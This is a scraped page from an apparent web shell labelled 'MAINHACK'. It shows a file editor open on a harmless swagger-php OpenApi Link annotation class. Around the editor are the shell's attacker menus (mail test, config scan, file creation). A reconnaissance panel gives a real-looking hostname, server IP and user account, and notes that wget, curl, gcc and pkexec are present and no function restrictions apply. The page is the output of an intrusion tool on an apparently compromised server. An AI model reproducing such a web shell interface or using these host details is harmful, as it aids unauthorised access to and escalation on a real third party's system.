[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Link.php
<?php declare(strict_types=1); /** * @license Apache 2.0 */ namespace OpenApi\Annotations; use OpenApi\Generator; /** * The Link object represents a possible design-time link for a response. * * The presence of a link does not guarantee the caller's ability to successfully invoke it, rather it provides a known * relationship and traversal mechanism between responses and other operations. * * Unlike dynamic links (i.e. links provided in the response payload), the OA linking mechanism does not require * link information in the runtime response. * * For computing links, and providing instructions to execute them, a runtime expression is used for * accessing values in an operation and using them as parameters while invoking the linked operation. * * @see [OAI Link Object](https://github.com/OAI/OpenAPI-Specification/blob/main/versions/3.1.0.md#link-object) * * @Annotation */ class Link extends AbstractAnnotation { /** * @see [Using refs](https://swagger.io/docs/specification/using-ref/) * * @var string|class-string|object */ public $ref = Generator::UNDEFINED; /** * The key into MediaType->links array. * * @var string */ public $link = Generator::UNDEFINED; /** * A relative or absolute reference to an OA operation. * * This field is mutually exclusive of the <code>operationId</code> field, and must point to an Operation object. * * Relative values may be used to locate an existing Operation object in the OpenAPI definition. * * @var string */ public $operationRef = Generator::UNDEFINED; /** * The name of an existing, resolvable OA operation, as defined with a unique <code>operationId</code>. * * This field is mutually exclusive of the <code>operationRef</code> field. * * @var string */ public $operationId = Generator::UNDEFINED; /** * A map representing parameters to pass to an operation as specified with operationId or identified via * operationRef. * * The key is the parameter name to be used, whereas the value can be a constant or an expression to * be evaluated and passed to the linked operation. * The parameter name can be qualified using the parameter location [{in}.]{name} for operations * that use the same parameter name in different locations (e.g. path.id). * * @var array<string,mixed> */ public $parameters = Generator::UNDEFINED; /** * A literal value or {expression} to use as a request body when calling the target operation. */ public $requestBody = Generator::UNDEFINED; /** * A description of the link. * * CommonMark syntax may be used for rich text representation. * * @var string */ public $description = Generator::UNDEFINED; /** * A server object to be used by the target operation. * * @var Server */ public $server = Generator::UNDEFINED; /** * @inheritdoc */ public static $_nested = [ Server::class => 'server', Attachable::class => ['attachables'], ]; /** * @inheritdoc */ public static $_parents = [ Components::class, Response::class, ]; }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.67 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002